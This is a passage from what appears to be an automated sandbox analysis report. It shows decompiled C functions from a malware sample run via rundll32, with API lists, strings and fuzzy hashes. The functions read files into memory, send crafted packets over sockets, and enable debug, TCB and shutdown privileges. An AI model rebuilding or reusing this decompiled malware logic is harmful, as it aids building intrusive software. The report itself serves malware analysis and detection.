							}
						}
					}
					CloseHandle(_v12);
				}
				return _v16;
			}

0x007b884c
0x007b884f
0x007b8855
0x007b885b
0x007b8866
0x007b886a
0x007b887c
0x007b8880
0x007b888c
0x007b8897
0x007b88af
0x007b88b5
0x007b88bb
0x007b889e
0x007b88a7
0x007b88a7
0x007b8897
0x007b88c2
0x007b88c6
0x007b88cc
0x007b88d2

APIs

CreateFileW.KERNEL32(007C7BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007B884F
GetFileSize.KERNEL32(00000000,00000000), ref: 007B8860
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B886F
HeapAlloc.KERNEL32(00000000), ref: 007B8876
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 007B888F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B88A0
HeapFree.KERNEL32(00000000), ref: 007B88A7
CloseHandle.KERNEL32(?), ref: 007B88C6

Strings

Oet Uet0Xet, xrefs: 007B886F, 007B88A0

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
String ID: Oet Uet0Xet
API String ID: 3250796435-3175316637
Opcode ID: 89500a4ef4df3523a4f125e715e21af11dd75fc53b095d670d42981e46624158
Instruction ID: c5c47b33b5f7291e10531b68a7637067723369aadabe9e67822c603974bcb719
Opcode Fuzzy Hash: 89500a4ef4df3523a4f125e715e21af11dd75fc53b095d670d42981e46624158
Instruction Fuzzy Hash: 2E113AB0900244BBDB206BA5AC8CFEFBFBCEB89754F108259F411A2150EB788D41DA25

Uniqueness

Uniqueness Score: -1.00%

Function 007B33A4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007B33A4(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed int _a24) {
				char _v5;
				long _v12;
				long _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				signed int _t38;
				void* _t40;
				void* _t46;

				_t21 = (_a24 & 0x0000ffff) + 0x37;
				_v5 = 0;
				_v12 = _t21;
				_t35 = HeapAlloc(GetProcessHeap(), 8, _t21);
				if(_t35 != 0) {
					_t38 = 9;
					_t27 = memcpy(_t35, _a8, _t38 << 2);
					__imp__#9(_v12 + 0xfffffffc, _t40, _t46);
					 *(_t35 + 2) = _t27;
					 *((short*)(_t35 + 0x22)) = _a12;
					 *((char*)(_t35 + 8)) = 0x26;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					_t15 = _t35 + 0x37; // 0x37
					asm("movsb");
					_t31 = memcpy(_t15, _a20, _a24 & 0x0000ffff);
					__imp__#19(_a4, _t35, _v12, 0);
					if(_t31 > 0) {
						_v5 = 1;
					}
					HeapFree(GetProcessHeap(), 8, _t35);
				}
				return _v5;
			}

0x007b33ae
0x007b33b4
0x007b33b8
0x007b33c8
0x007b33cc
0x007b33d8
0x007b33df
0x007b33e1
0x007b33ea
0x007b33f2
0x007b33fa
0x007b3401
0x007b3402
0x007b3403
0x007b3404
0x007b3409
0x007b340b
0x007b340f
0x007b3410
0x007b3421
0x007b342b
0x007b342d
0x007b342d
0x007b343b
0x007b343b
0x007b3446

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3745,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B33BB
HeapAlloc.KERNEL32(00000000,?,007B3745,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B33C2
htons.WS2_32(?), ref: 007B33E1
memcpy.MSVCRT ref: 007B3410
send.WS2_32(?,00000000,?,00000000), ref: 007B3421
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3434
HeapFree.KERNEL32(00000000), ref: 007B343B

Strings

Oet Uet0Xet, xrefs: 007B33BB, 007B3434

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreehtonsmemcpysend
String ID: Oet Uet0Xet
API String ID: 4260819906-3175316637
Opcode ID: 02e97d3a0f276f91db86d69bb9ca70e9aafb8299b14fc0d80e4abb6b45cced77
Instruction ID: 77ccb887af9f3656a37b6820749fe0d6fdf8e2a2694976248dd1b10663d81a28
Opcode Fuzzy Hash: 02e97d3a0f276f91db86d69bb9ca70e9aafb8299b14fc0d80e4abb6b45cced77
Instruction Fuzzy Hash: E9118BB6400289ABDB119FA4DC89FEB3BA8EF09310F048155FD009B252E7B9D945C775

Uniqueness

Uniqueness Score: -1.00%

Function 007B3209 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E007B3209(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, void* _a20, signed short _a24) {
				char _v5;
				long _v12;
				long _t22;
				void* _t28;
				int _t31;
				void* _t33;
				void* _t37;
				signed int _t40;
				void* _t44;
				void* _t52;

				_t22 = (_a24 & 0x0000ffff) + 0x4b;
				_v5 = 0;
				_v12 = _t22;
				_t37 = HeapAlloc(GetProcessHeap(), 8, _t22);
				if(_t37 != 0) {
					_t40 = 9;
					_t28 = memcpy(_t37, _a8, _t40 << 2);
					__imp__#9(_v12 + 0xfffffffc, _t44, _t52);
					 *(_t37 + 2) = _t28;
					 *((short*)(_t37 + 0x22)) = _a12;
					 *((char*)(_t37 + 8)) = 0xa1;
					_t13 = _t37 + 0x24; // 0x24
					_t31 = memcpy(_t13, _a16, 0 << 2);
					asm("movsw");
					_t16 = _t37 + 0x4b; // 0x4b
					asm("movsb");
					_t33 = memcpy(_t16, _a20, _t31);
					__imp__#19(_a4, _t37, _v12, 0, 9);
					if(_t33 > 0) {
						_v5 = 1;
					}
					HeapFree(GetProcessHeap(), 8, _t37);
				}
				return _v5;
			}

0x007b3213
0x007b3219
0x007b321d
0x007b322d
0x007b3231
0x007b323d
0x007b3244
0x007b3246
0x007b324f
0x007b3259
0x007b3262
0x007b3266
0x007b3269
0x007b326f
0x007b3271
0x007b3275
0x007b3276
0x007b3287
0x007b3291
0x007b3293
0x007b3293
0x007b32a1
0x007b32a1
0x007b32ac

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E), ref: 007B3220
HeapAlloc.KERNEL32(00000000,?,007B3BAA,?,?,?,00000000,00000000,?,?,?,007B4A6E,?,?,?,?), ref: 007B3227
htons.WS2_32(?), ref: 007B3246
memcpy.MSVCRT ref: 007B3276
send.WS2_32(?,00000000,?,00000000), ref: 007B3287
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B329A
HeapFree.KERNEL32(00000000), ref: 007B32A1

Strings

Oet Uet0Xet, xrefs: 007B3220, 007B329A

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreehtonsmemcpysend
String ID: Oet Uet0Xet
API String ID: 4260819906-3175316637
Opcode ID: 825da4ce8bf9f4f36e5d9f37711f713cdc68c71127bd8d7636e7c9fc0dfb6a62
Instruction ID: 835212f07881d5215b7dcf5b6d786143d2004264764c09dba52649811257a2ac
Opcode Fuzzy Hash: 825da4ce8bf9f4f36e5d9f37711f713cdc68c71127bd8d7636e7c9fc0dfb6a62
Instruction Fuzzy Hash: FF116776500289ABDB109FA89C89FEB7BA8FB49324F048155FE009A292E779C905C764

Uniqueness

Uniqueness Score: -1.00%

Function 007B4F43 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B4F43(short __eax, intOrPtr _a4, void* _a8, void** _a12) {
				char _v5;
				char _v12;
				void* _v16;
				signed int _t27;
				int _t28;
				void* _t36;
				void* _t39;
				signed char _t40;
				signed int _t41;
				short _t50;

				_t50 = __eax;
				_v5 = 0;
				_t39 = HeapAlloc(GetProcessHeap(), 8, 0x68);
				if(_t39 == 0) {
					L11:
					return _v5;
				}
				_t40 = 0;
				do {
					_t27 = _t40 & 0x000000ff;
					_t2 = _t27 + 0x7c3730; // 0xfcfffffa
					_t40 = _t40 + 1;
					 *(_t39 + _t27) =  !( *_t2);
				} while (_t40 < 0x68);
				_t28 = rand();
				 *(_t39 + 0x18) = _t28;
				 *((short*)(_t39 + 0x34)) = _t28 + _t50;
				if(E007B2F5A(_a4, _a8, _t50, 0, 0xff, 8, _t39, 0x68) != 0) {
					_v12 = 0;
					_v16 = 0;
					if(E007B3071(_t40, _a4, _a8, _t50,  &_v16,  &_v12) != 0) {
						_t36 = _v16;
						if(_v12 == 0x70 &&  *((intOrPtr*)(_t36 + 0x50)) == 0x18 &&  *((intOrPtr*)(_t36 + 0x6c)) == 0) {
							_t41 = 5;
							_t36 = memcpy( *_a12, _t36 + 0x58, _t41 << 2);
							_v5 = 1;
						}
						HeapFree(GetProcessHeap(), 8, _t36);
					}
				}
				HeapFree(GetProcessHeap(), 8, _t39);
				goto L11;
			}

0x007b4f50
0x007b4f52
0x007b4f63
0x007b4f69
0x007b5014
0x007b501b
0x007b501b
0x007b4f6f
0x007b4f71
0x007b4f71
0x007b4f74
0x007b4f7a
0x007b4f7e
0x007b4f81
0x007b4f86
0x007b4f9b
0x007b4fa4
0x007b4faf
0x007b4fbd
0x007b4fc3
0x007b4fcd
0x007b4fd3
0x007b4fd6
0x007b4fed
0x007b4fee
0x007b4ff0
0x007b4ff0
0x007b4ffe
0x007b4ffe
0x007b4fcd
0x007b500e
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000068,74654F20,?,77D74620,?,007B51F9,?,?,?), ref: 007B4F56
HeapAlloc.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B4F5D
rand.MSVCRT ref: 007B4F86
GetProcessHeap.KERNEL32(00000008,?,007B51F9,?,00000000,?,007B51F9,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 007B4FF7
HeapFree.KERNEL32(00000000), ref: 007B4FFE
GetProcessHeap.KERNEL32(00000008,00000000,007B51F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,007B51F9,?,?,?), ref: 007B5007
HeapFree.KERNEL32(00000000,?,007B51F9,?,?,?), ref: 007B500E

Strings

Oet Uet0Xet, xrefs: 007B4F56, 007B4FF7, 007B5007
p, xrefs: 007B4FCF

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$Allocrand
String ID: Oet Uet0Xet$p
API String ID: 2875874559-2104030822
Opcode ID: 724031f972d314376903f10fc0585a2dee7e4ee95bcff99542ae3347fb86c16a
Instruction ID: bf8614120629678e46a02ff253bf2ff84ad6ef7fff2906b49b6f9deb4c3b3395
Opcode Fuzzy Hash: 724031f972d314376903f10fc0585a2dee7e4ee95bcff99542ae3347fb86c16a
Instruction Fuzzy Hash: DC21E235900248BFDF21AFA48C89FEE7F79FF55315F048095F9009B192D6798949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007B69AE Relevance: 12.6, APIs: 10, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B69AE(void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t31;
				void* _t36;
				intOrPtr* _t38;
				intOrPtr* _t43;
				void* _t48;
				intOrPtr* _t51;
				long _t57;
				intOrPtr _t61;
				void* _t63;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t69;
				void* _t70;

				_t31 = _a4;
				_v8 = _v8 & 0x00000000;
				_t61 =  *0x7c7b80;
				_t63 = _t31 + 2;
				do {
					_t67 =  *_t31;
					_t31 = _t31 + 2;
				} while (_t67 != 0);
				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
				_v16 = _t36;
				if(_t36 != 0) {
					_t38 = _a4;
					_t68 = _t38 + 2;
					do {
						_t64 =  *_t38;
						_t38 = _t38 + 2;
					} while (_t64 != 0);
					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
					_t43 = _a8;
					_t65 = _t43 + 2;
					do {
						_t69 =  *_t43;
						_t43 = _t43 + 2;
					} while (_t69 != 0);
					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
					_v12 = _t48;
					if(_t48 == 0) {
						L12:
						HeapFree(GetProcessHeap(), 0, _v16);
					} else {
						_t51 = _a8;
						_t70 = _t51 + 2;
						do {
							_t66 =  *_t51;
							_t51 = _t51 + 2;
						} while (_t66 != 0);
						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
						_t57 = E007B6E66(_t66, _t61,  &_v16, _a12);
						_v8 = _t57;
						if(_t57 == 0) {
							HeapFree(GetProcessHeap(), _t57, _v12);
							goto L12;
						}
					}
				}
				return _v8;
			}

0x007b69b4
0x007b69b7
0x007b69bc
0x007b69c4
0x007b69c7
0x007b69c7
0x007b69ca
0x007b69cd
0x007b69ec
0x007b69ee
0x007b69f3
0x007b69f9
0x007b69fc
0x007b69ff
0x007b69ff
0x007b6a02
0x007b6a05
0x007b6a19
0x007b6a1e
0x007b6a24
0x007b6a27
0x007b6a27
0x007b6a2a
0x007b6a2d
0x007b6a40
0x007b6a48
0x007b6a4d
0x007b6a94
0x007b6a9c
0x007b6a4f
0x007b6a4f
0x007b6a52
0x007b6a55
0x007b6a55
0x007b6a58
0x007b6a5b
0x007b6a6f
0x007b6a7f
0x007b6a84
0x007b6a89
0x007b6a92
0x00000000
0x007b6a92
0x007b6a89
0x007b6a4d
0x007b6aa5

APIs

GetProcessHeap.KERNEL32(00000008,?,766384F0,00000000,00000000), ref: 007B69E3
HeapAlloc.KERNEL32(00000000), ref: 007B69EC
memcpy.MSVCRT ref: 007B6A19
GetProcessHeap.KERNEL32(00000008,?), ref: 007B6A3D
HeapAlloc.KERNEL32(00000000), ref: 007B6A40
memcpy.MSVCRT ref: 007B6A6F
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 007B6A8F
HeapFree.KERNEL32(00000000), ref: 007B6A92
GetProcessHeap.KERNEL32(00000000,?), ref: 007B6A99
HeapFree.KERNEL32(00000000), ref: 007B6A9C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreememcpy
String ID:
API String ID: 3405790324-0
Opcode ID: 5d5b482668fe812f6bcf55535e04ba6d4b41c01d238855afc262002f95897610
Instruction ID: 5176ed76c2c3ac6f7706817d54c45109b69c47b0ea71e98a9a6fb0c9c572f2e6
Opcode Fuzzy Hash: 5d5b482668fe812f6bcf55535e04ba6d4b41c01d238855afc262002f95897610
Instruction Fuzzy Hash: E931617690010AAFCF14AFA8CC45FEA7BB9EF54344F05C555EA04DB261E678EB14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007B68B5 Relevance: 12.6, APIs: 10, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B68B5(void* _a4, void* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				intOrPtr* _t33;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t45;
				void* _t50;
				intOrPtr* _t53;
				void* _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t73;
				void* _t74;

				_v8 = _v8 & 0x00000000;
				_v12 =  *0x7c7b80;
				_t33 = _a4;
				_t67 = _t33 + 2;
				do {
					_t71 =  *_t33;
					_t33 = _t33 + 2;
				} while (_t71 != 0);
				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
				_v20 = _t38;
				if(_t38 != 0) {
					_t40 = _a4;
					_t72 = _t40 + 2;
					do {
						_t68 =  *_t40;
						_t40 = _t40 + 2;
					} while (_t68 != 0);
					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
					_t45 = _a8;
					_t69 = _t45 + 2;
					do {
						_t73 =  *_t45;
						_t45 = _t45 + 2;
					} while (_t73 != 0);
					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
					_v16 = _t50;
					if(_t50 != 0) {
						_t53 = _a8;
						_t74 = _t53 + 2;
						do {
							_t70 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t70 != 0);
						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
						_v8 = E007B6E1B(_v12, 0, _t70,  &_v20);
						HeapFree(GetProcessHeap(), 0, _v16);
					}
					HeapFree(GetProcessHeap(), 0, _v20);
				}
				return _v8;
			}

0x007b68c0
0x007b68c4
0x007b68c7
0x007b68ca
0x007b68cd
0x007b68cd
0x007b68d0
0x007b68d3
0x007b68f4
0x007b68f6
0x007b68fb
0x007b6901
0x007b6904
0x007b6907
0x007b6907
0x007b690a
0x007b690d
0x007b6921
0x007b6926
0x007b692c
0x007b692f
0x007b692f
0x007b6932
0x007b6935
0x007b6949
0x007b6951
0x007b6956
0x007b6958
0x007b695b
0x007b695e
0x007b695e
0x007b6961
0x007b6964
0x007b6978
0x007b6991
0x007b6998
0x007b6998
0x007b69a2
0x007b69a4
0x007b69ab

APIs

GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
HeapAlloc.KERNEL32(00000000), ref: 007B68F4
memcpy.MSVCRT ref: 007B6921
GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
HeapAlloc.KERNEL32(00000000), ref: 007B6949
memcpy.MSVCRT ref: 007B6978
GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
HeapFree.KERNEL32(00000000), ref: 007B6998
GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
HeapFree.KERNEL32(00000000), ref: 007B69A2

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreememcpy
String ID:
API String ID: 3405790324-0
Opcode ID: 2d934a14b6f07713c0c750ca3dd1c58ecf634997ba3b76a832f66d23e816ff3a
Instruction ID: dfed990b6f377c0a6e9a9cca5c2ceefb1463bca758e669fb392ff18d775b6625
Opcode Fuzzy Hash: 2d934a14b6f07713c0c750ca3dd1c58ecf634997ba3b76a832f66d23e816ff3a
Instruction Fuzzy Hash: 74315E7590010AAFCB14EFA8CC46EEFBBB9FF48344F058555EA44CB251E678EA14CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007B6735 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6735(WCHAR* _a4, intOrPtr _a8) {
				short _v2052;
				void* _t10;
				intOrPtr* _t13;
				WCHAR* _t16;
				WCHAR* _t22;
				intOrPtr _t29;
				short _t30;
				void* _t33;
				short* _t34;
				signed int _t36;
				signed int _t39;

				_t10 = E007B6477();
				if(_t10 < 0xf) {
					_t10 = 0xf;
				}
				wsprintfW( &_v2052, L"%d", _t10);
				_t13 =  &_v2052;
				_t33 = _t13 + 2;
				do {
					_t29 =  *_t13;
					_t13 = _t13 + 2;
				} while (_t29 != 0);
				_t39 = _t13 - _t33 >> 1;
				EnterCriticalSection(0x7c7b9c);
				_t46 =  *0x7c3010;
				if( *0x7c3010 != 0) {
					E007B6628(_t29, _t46);
				}
				_t16 = 0x7c3b90;
				_t4 =  &(_t16[1]); // 0x7c3b92
				_t34 = _t4;
				do {
					_t30 =  *_t16;
					_t16 =  &(_t16[1]);
				} while (_t30 != 0);
				_t36 = (_t16 - _t34 >> 1) + _t39;
				if(_t36 >= _a8 - 1) {
					SetLastError(0x7a);
				} else {
					_t22 = _a4;
					 *_t22 = 0;
					StrCatW(_t22,  &_v2052);
					StrCatW(_a4, 0x7c3b90);
					_t39 = _t36;
				}
				LeaveCriticalSection(0x7c7b9c);
				return _t39;
			}

0x007b673e
0x007b6746
0x007b674a
0x007b674a
0x007b6758
0x007b675e
0x007b6767
0x007b676a
0x007b676a
0x007b676d
0x007b6770
0x007b6781
0x007b6783
0x007b6789
0x007b6790
0x007b6792
0x007b6792
0x007b679c
0x007b679e
0x007b679e
0x007b67a1
0x007b67a1
0x007b67a4
0x007b67a7
0x007b67b0
0x007b67b9
0x007b67df
0x007b67bb
0x007b67bb
0x007b67c6
0x007b67d1
0x007b67d7
0x007b67d9
0x007b67d9
0x007b67ea
0x007b67f6

APIs

Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477

wsprintfW.USER32 ref: 007B6758
EnterCriticalSection.KERNEL32(007C7B9C,?,00000000,00000000), ref: 007B6783
StrCatW.SHLWAPI(?,?), ref: 007B67D1
StrCatW.SHLWAPI(?,007C3B90), ref: 007B67D7
SetLastError.KERNEL32(0000007A), ref: 007B67DF
LeaveCriticalSection.KERNEL32(007C7B9C), ref: 007B67EA

Strings

pGdv0Hcv, xrefs: 007B67BE

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
String ID: pGdv0Hcv
API String ID: 230659905-3560805785
Opcode ID: 49775964934f3bdc076f4a256021dca2ea6f2b145c10c69349f6872a9bd8d6fb
Instruction ID: 4af242d1ef183825a737a012d6a2583e4f3c29bdd6d5fd07cbadaf4889794937
Opcode Fuzzy Hash: 49775964934f3bdc076f4a256021dca2ea6f2b145c10c69349f6872a9bd8d6fb
Instruction Fuzzy Hash: B311D3726001099BCB206B68DC49FEA37A9FF44344F058965F646DB190FABCEE04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 007B7897 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E007B7897(void* __ecx, void* __esi) {
				char _v8;
				long _t3;
				void* _t15;
				signed int _t18;

				if( *0x7c7b8c == 0) {
					srand(GetTickCount());
					_pop(_t15);
					 *0x7c7b90 = GetTickCount();
					_t18 = 0;
					if(E007B7CC5(L"SeShutdownPrivilege") != 0) {
						_t18 = 1;
					}
					if(E007B7CC5(L"SeDebugPrivilege") != 0) {
						_t18 = _t18 | 0x00000002;
					}
					if(E007B7CC5(L"SeTcbPrivilege") != 0) {
						_t18 = _t18 | 0x00000004;
					}
					 *0x7c7bc0 = _t18;
					 *0x7c7b7c = E007B855F();
					E007B554A(_t15,  &_v8, 4);
					 *0x7c7bbc = _v8;
					_t3 = GetModuleFileNameW( *0x7c7b98, 0x7c7bc8, 0x30c);
					if(_t3 != 0) {
						return E007B8832();
					}
				}
				return _t3;
			}

0x007b78a2
0x007b78b2
0x007b78b8
0x007b78c0
0x007b78c5
0x007b78ce
0x007b78d0
0x007b78d0
0x007b78dd
0x007b78df
0x007b78df
0x007b78ee
0x007b78f0
0x007b78f0
0x007b78f3
0x007b78fe
0x007b7909
0x007b7921
0x007b7926
0x007b792f
0x00000000
0x007b7931
0x007b792f
0x007b7937

APIs

GetTickCount.KERNEL32 ref: 007B78AF
srand.MSVCRT ref: 007B78B2
GetTickCount.KERNEL32 ref: 007B78B9

Part of subcall function 007B7CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,007B79E8), ref: 007B7CE9
Part of subcall function 007B7CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,007B79E8), ref: 007B7CF0
Part of subcall function 007B7CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007B7D02
Part of subcall function 007B7CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B7D25
Part of subcall function 007B7CC5: GetLastError.KERNEL32(?,00000000), ref: 007B7D2D
Part of subcall function 007B7CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,007B79E8), ref: 007B7D3F

GetModuleFileNameW.KERNEL32(007C7BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B7926

Strings

SeDebugPrivilege, xrefs: 007B78D1
SeTcbPrivilege, xrefs: 007B78E2
SeShutdownPrivilege, xrefs: 007B78BB

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CountErrorLastProcessTickToken$AdjustCurrentFileLookupModuleNameOpenPrivilegePrivilegesValuesrand
String ID: SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
API String ID: 1536163209-50072501
Opcode ID: 8ed9fd3e64c6ebbf91e0eb15148c34c66f4ac0e0b6e59704849a214a892be52f
Instruction ID: 9abf06928d61d0b4e83561f04703493f4818062cd9469fd8125e04171a907af7
Opcode Fuzzy Hash: 8ed9fd3e64c6ebbf91e0eb15148c34c66f4ac0e0b6e59704849a214a892be52f
Instruction Fuzzy Hash: F80112B1908214D6D728AF759C0AF8A3F6DAB44750B55816DE80196191DF7CDD00CFA5

Uniqueness

